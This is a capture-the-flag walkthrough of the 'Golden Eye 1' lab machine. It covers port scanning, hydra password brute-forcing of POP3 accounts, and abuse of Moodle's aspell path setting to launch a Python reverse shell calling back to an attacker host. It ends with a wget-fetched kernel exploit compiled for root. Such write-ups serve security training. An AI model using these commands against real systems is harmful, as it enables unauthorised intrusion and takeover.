# Golden Eye 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds

```

```
nmap -p- -Pn 192.168.1.116 
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

```

We can see that there are two more unknown ports open on the server.

Let's open the IP in a web browser.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80mU0x_rRluYzvaOvd%2Fimage.png?alt=media\&token=841b48e1-0491-425f-82ef-ca343b96886e)

Let's navigate to `/sev-home`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80n1-lKQk68lc-fl0Y%2Fimage.png?alt=media\&token=85b3aaae-8e17-4cd7-a366-f4147388195b)

If we go back to the main page and open the browser's inspector, we can see a JavaScript file.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80nl-7jjXW1ZoXJa68%2Fimage.png?alt=media\&token=2f2f2ab5-9639-486e-a453-c03172c08b2d)

We can see there is an obfuscated password. I copied it and pasted it into the Google search bar and, surprisingly, got this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80uy0R3JkQ3SVWsQ1_%2Fimage.png?alt=media\&token=10f74cf7-da2d-401b-abb2-6eb976b4e960)

The username is obviously `boris`, and we can log in.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80vHXpHgFia8G86oGq%2Fimage.png?alt=media\&token=79967fa7-5f2a-4273-90aa-d720bfff6242)

We can see that there is a POP3 server running.

If we use nmap to enumerate both of the unknown ports:

```
nmap -sV -p 55006,55007 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

```

Now we know that 55007 is running POP3 (Dovecot).
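The three scans above were written with `-oA`, which also produces a grepable `.gnmap` file. As an added example (not part of the original write-up), here is a small parser for that format that lists open ports and flags services on ports they are not normally expected on, which is exactly how 55006/55007 stood out here. The `.gnmap` content is constructed from the scan results shown above, and `EXPECTED_PORTS` is an assumed, deliberately short mapping.

```python
import re

# Constructed .gnmap content assembled from the scans above (nmap -oA writes
# it beside the .nmap/.xml files). In this format a "/" inside a service or
# version field is written as "|", hence "ssl|unknown".
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Sat May 23 10:28:00 2020 as: nmap -sV -oA nmap/GEv1 192.168.1.116
Host: 192.168.1.116 ()\tStatus: Up
Host: 192.168.1.116 ()\tPorts: 25/open/tcp//smtp//Postfix smtpd/, 80/open/tcp//http//Apache httpd 2.4.7 ((Ubuntu))/, 55006/open/tcp//ssl|unknown///, 55007/open/tcp//pop3//Dovecot pop3d/\tIgnored State: closed (65531)
"""

# Assumed table of ports each service normally lives on; extend as needed.
EXPECTED_PORTS = {"smtp": {25, 465, 587}, "http": {80, 8080}, "pop3": {110, 995}}


def parse_gnmap(text):
    """Return (host, port, proto, service, version) for every open port."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^Host: (\S+) .*?\tPorts: (.*?)(?:\t|$)", line)
        if not m:
            continue  # comment lines and Status-only lines carry no ports
        host, ports = m.groups()
        for item in ports.split(", "):
            # field order: port/state/proto/owner/service/rpcinfo/version/
            port, state, proto, _owner, service, _rpc, version, *_ = item.split("/")
            if state == "open":
                entries.append((host, int(port), proto, service.replace("|", "/"), version))
    return entries


def unusual_services(entries):
    """Flag open ports nmap could not identify, or whose service runs on a
    port it is not expected on (e.g. pop3 on 55007)."""
    flagged = []
    for host, port, _proto, service, version in entries:
        base = service.split("/")[-1]  # "ssl/unknown" -> "unknown"
        expected = EXPECTED_PORTS.get(base)
        if base == "unknown" or (expected is not None and port not in expected):
            flagged.append((host, port, service, version))
    return flagged


if __name__ == "__main__":
    for host, port, service, version in unusual_services(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{host}:{port} {service} {version!r} looks unusual")
```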

## Exploitation

### Hydra

Then we can brute-force the passwords of `boris` and `natalya`:

```
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

```
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80xtwCV16Ez8yFniDC%2Fimage.png?alt=media\&token=25e086b2-93f2-4a05-bb21-becdc37f06b5)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80yuU-2utL2baG_mjI%2Fimage.png?alt=media\&token=b41784d8-79ba-4763-9549-a7b40961e1d2)

Got the password! We can now log in to the POP3 server:

```
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2 
RETR 3
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80zCW_opDG9CuuKJPm%2Fimage.png?alt=media\&token=013fb5ba-f043-4f2d-99b2-5336f1fcaa2f)

Nothing seems very interesting here, so we move on to `natalya`.

Doing the same for `natalya` as we did for `boris`, we get something pretty interesting:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80zlTmCSWD6k1SiO9R%2Fimage.png?alt=media\&token=d4b39f73-4fe3-4714-8a1c-6eb586f4f80b)

We got a set of credentials. We also need to add an entry for `severnaya-station.com` pointing at the server IP to `/etc/hosts` so that we can reach `severnaya-station.com/gnocertdir`.

After doing that, we can open the browser and navigate to `severnaya-station.com/gnocertdir`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M811SAadFmusruBd4Ey%2Fimage.png?alt=media\&token=a81af0f5-8ef5-406c-ade6-0427338f0da9)

We can log in with the credentials given in the mail.

Then we can navigate to Messages, where we can see that the next username is `doak`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M8122BvFJdb30jjvy-2%2Fimage.png?alt=media\&token=204bc194-a5d9-4610-ac3d-79aad25d0e5a)

Now we can take the username `doak` and brute-force it with hydra again:

```
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M813PD_Bt6fulmj6emi%2Fimage.png?alt=media\&token=cc573d51-1491-4b77-99a1-71feb47ba29f)

We got the credentials, so we can go back to the POP3 server and log in:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M813zpGYh_oMxfLLRoT%2Fimage.png?alt=media\&token=8407c18d-2165-42d2-bbd2-7d56148a59fd)

We got another set of credentials, so we go back to Moodle and log in:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M814HhBHFsJGSDHwxoQ%2Fimage.png?alt=media\&token=cc02aa2c-9015-4527-ba04-83767c3c553a)

We then go to Private files, where there is an `s3cret.txt`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M814Sg1yoeCcZSloCWa%2Fimage.png?alt=media\&token=f8c99d55-e0d4-4f07-9a1f-ce34e8a1d1eb)

After catting the file, we get this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M815P3HdLucoP26QQ7r%2Fimage.png?alt=media\&token=9826492c-6dd0-4f21-b31e-8f6f95188f68)

It says the picture leads to the admin credentials.

There is a link in the file; if we follow it:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M815ZENcv3iJ0UxxbsS%2Fimage.png?alt=media\&token=9784d67b-906c-4485-be3f-e27504134daa)

If we download the picture and run the `strings` command to list all readable content, we get this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M816K4qLuqLDQg-GAm6%2Fimage.png?alt=media\&token=104e62a1-019f-4920-9937-ee158c6a65a6)

We can see that there is a base64-encoded line.

After decoding it we get:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M816UX7ooalZz4Vbc1h%2Fimage.png?alt=media\&token=968dbb03-5e6a-4cb5-a8ae-f8bbbcb4283e)

Let's log in to Moodle using the credentials we just got:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M817wXvNDPzY1tJ0qe1%2Fimage.png?alt=media\&token=2ebdab5b-61eb-4047-92c1-12eac1a560fd)

After playing around, I found out that under Site administration > Plugins > Text editors there is a TinyMCE HTML editor.

We need to change the Spell engine from Google Spell to PSpellShell.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M818Rk730eblkM6kE-E%2Fimage.png?alt=media\&token=ae4becb3-baed-4156-833a-0a5f1143bd5b)

Then, under Server > System paths, we can see that there is a Path to aspell setting.

### Reverse Shell

I tried using netcat but it didn't work, so we set that path to a Python reverse shell instead.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M818aW4kd6el8xq5cw0%2Fimage.png?alt=media\&token=74d0826f-a121-4c43-bca5-45cd0fa62f47)

Then we set up a listener on our machine:

```
nc -nlvp 4444
```

Then we can go to Blog and add a new entry:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81AF7hrJhImW8VjWYU%2Fimage.png?alt=media\&token=acc15ef9-6ec5-4d21-ba08-6ec48f77a357)

After that, click the spell-check button to trigger the reverse shell:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81AKydMz7PtmiKxd30%2Fimage.png?alt=media\&token=2c2ada5e-8689-44cd-8d37-631dd5c75021)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81AOgAG-vWp-hI6yEp%2Fimage.png?alt=media\&token=e78b4a43-b641-403e-abfa-b83b39150679)

Then we can upgrade to a proper TTY with a Python command:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

## Privilege Escalation

If we type `uname -a`, we can see that the kernel is out of date:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BLKhkAMNVFjVxRdT%2Fimage.png?alt=media\&token=73404af3-4e6c-4eb0-9f35-bbb55d250165)

We can then look up the kernel version with `searchsploit`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BSwEeL52L4VB1A7m%2Fimage.png?alt=media\&token=2073a44f-4944-4dff-8216-e8f7d30be083)

After that we can copy the exploit to our working directory. I tried to transfer the file to the target machine, but `gcc` is not available there, although `cc` is.

So we need to change something in the exploit: replace `gcc` with `cc`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BmhYGlszbii6Kljc%2Fimage.png?alt=media\&token=545aca69-37bd-46c7-89ae-0418628c2436)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BrEMymU7sGNdf-Cx%2Fimage.png?alt=media\&token=5b57bdc2-ad30-4d2e-99f3-ba0a3329e74f)

Then on our machine we can fire up Python's SimpleHTTPServer:

```
python -m SimpleHTTPServer
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81C7814oXEr_fhwcfi%2Fimage.png?alt=media\&token=b6b7fa8a-ad0f-4c39-aa84-4eb186b3c193)

On the target machine, navigate to the `/tmp` directory and `wget` the file:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81CQpKnEqTqrUGKqUx%2Fimage.png?alt=media\&token=5fdd7d6a-9b65-44ef-a900-10e40b83e1b3)

Then we can compile and run it:

```
cc 37292.c -o exploit
chmod +x exploit
./exploit
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81CiBjFhq3U1hcljId%2Fimage.png?alt=media\&token=dac7dc9f-58f5-42c6-bb91-f2082d9997dd)

Navigate to `/root` and get `.flag.txt`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81CouHn-8k3kQkM9E5%2Fimage.png?alt=media\&token=637e5873-f46d-4074-9496-bb9f4e634b5b)

Then we can navigate to the URL it provides:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81D0ltZFjL8VaKGrMZ%2Fimage.png?alt=media\&token=1703ff55-d39d-4b4c-98b8-9da403523071)

Congratulations!
